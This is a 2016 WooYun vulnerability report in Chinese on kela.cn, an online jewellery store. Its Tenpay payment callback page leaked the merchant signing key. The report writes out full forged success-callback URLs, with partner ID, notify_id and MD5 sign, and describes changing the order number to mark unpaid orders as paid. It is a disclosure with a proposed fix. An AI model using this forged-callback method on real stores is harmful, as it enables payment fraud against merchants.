当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167579

漏洞标题:珂兰网上商城敏感泄露导致订单直接可显示支付成功

相关厂商:上海珂兰商贸有限公司

漏洞作者: 江湖闯名号

提交时间:2016-01-06 22:27

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

珂兰官方网站:http://www.kela.cn
步骤很简单,下单后选择财付通支付,之后找到return_url项,访问该地址即可看到财付通的key,根据财付通的付款成功返回规则填写好,获得url:
http://www.kela.cn/payment/tenpay/afterpay/order_type/1/order_sn/20160105751366/pay_mod/1/order_payment_sn/2016010575136619685?&bank_type=0&discount=0&fee_type=1&input_charset=GBK&notify_id=NWIW8mCc1Cf3zg6Lh0ADUAiJzWT4Rit-LLgJSWR00PMXnRGlqPx6MzwOLiHrrw7e1eOBKGCfEwhX8IantaySZjS85eDgO2BD&out_trade_no=2016010575136619685&partner=1216068301&product_fee=1299900&sign_type=MD5&time_end=201601051826&total_fee=1299900&trade_mode=1&trade_state=0&transaction_id=1216068301201601050867118285&transport_fee=0&sign=9410d841911f211c6da6495ef0faa77b
该订单已验证过了 直接回提示支付成功的,改下订单号吧
http://www.kela.cn/payment/tenpay/afterpay/order_type/1/order_sn/20160105514347/pay_mod/1/order_payment_sn/2016010551434711072?&bank_type=0&discount=0&fee_type=1&input_charset=GBK&notify_id=NWIW8mCc1Cf3zg6Lh0ADUAiJzWT4Rit-LLgJSWR00PMXnRGlqPx6MzwOLiHrrw7e1eOBKGCfEwhX8IantaySZjS85eDgO2BD&out_trade_no=2016010575136619685&partner=1216068301&product_fee=1299900&sign_type=MD5&time_end=201601051826&total_fee=1299900&trade_mode=1&trade_state=0&transaction_id=1216068301201601050867118285&transport_fee=0&sign=9410d841911f211c6da6495ef0faa77b
用这个就可以直接看到了。
其他就不多说了,就是notify_id需要用新支付过的用老的会提示不成功的,所以我去别的地方付过1块钱的得到了一个最新的notify_id,用老的或者是随便乱编的notify_id是不会提示成功的。

QQ图片20160105181249.png


QQ图片20160105181344.png


QQ图片20160105181453.png


QQ图片20160105181540.png


QQ图片20160105182752.png


QQ图片20160105190500.png


QQ图片20160105192756.png


QQ图片20160105194726.png

漏洞证明:

珂兰官方网站:http://www.kela.cn
步骤很简单,下单后选择财付通支付,之后找到return_url项,访问该地址即可看到财付通的key,根据财付通的付款成功返回规则填写好,获得url:
http://www.kela.cn/payment/tenpay/afterpay/order_type/1/order_sn/20160105751366/pay_mod/1/order_payment_sn/2016010575136619685?&bank_type=0&discount=0&fee_type=1&input_charset=GBK&notify_id=NWIW8mCc1Cf3zg6Lh0ADUAiJzWT4Rit-LLgJSWR00PMXnRGlqPx6MzwOLiHrrw7e1eOBKGCfEwhX8IantaySZjS85eDgO2BD&out_trade_no=2016010575136619685&partner=1216068301&product_fee=1299900&sign_type=MD5&time_end=201601051826&total_fee=1299900&trade_mode=1&trade_state=0&transaction_id=1216068301201601050867118285&transport_fee=0&sign=9410d841911f211c6da6495ef0faa77b
该订单已验证过了 直接回提示支付成功的,改下订单号吧
http://www.kela.cn/payment/tenpay/afterpay/order_type/1/order_sn/20160105514347/pay_mod/1/order_payment_sn/2016010551434711072?&bank_type=0&discount=0&fee_type=1&input_charset=GBK&notify_id=NWIW8mCc1Cf3zg6Lh0ADUAiJzWT4Rit-LLgJSWR00PMXnRGlqPx6MzwOLiHrrw7e1eOBKGCfEwhX8IantaySZjS85eDgO2BD&out_trade_no=2016010575136619685&partner=1216068301&product_fee=1299900&sign_type=MD5&time_end=201601051826&total_fee=1299900&trade_mode=1&trade_state=0&transaction_id=1216068301201601050867118285&transport_fee=0&sign=9410d841911f211c6da6495ef0faa77b
用这个就可以直接看到了。
其他就不多说了,就是notify_id需要用新支付过的用老的会提示不成功的,所以我去别的地方付过1块钱的得到了一个最新的notify_id,用老的或者是随便乱编的notify_id是不会提示成功的。

QQ图片20160105181249.png


QQ图片20160105181344.png


QQ图片20160105181453.png


QQ图片20160105181540.png


QQ图片20160105182752.png


QQ图片20160105190500.png


QQ图片20160105192756.png


QQ图片20160105194726.png

修复方案:

删除支付成功回调页面显示key和生成sign值的这部分代码。
另外我支付成功的订单号是:20160105751366
弱弱的问句:请问算吗?

版权声明:转载请注明来源 江湖闯名号@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价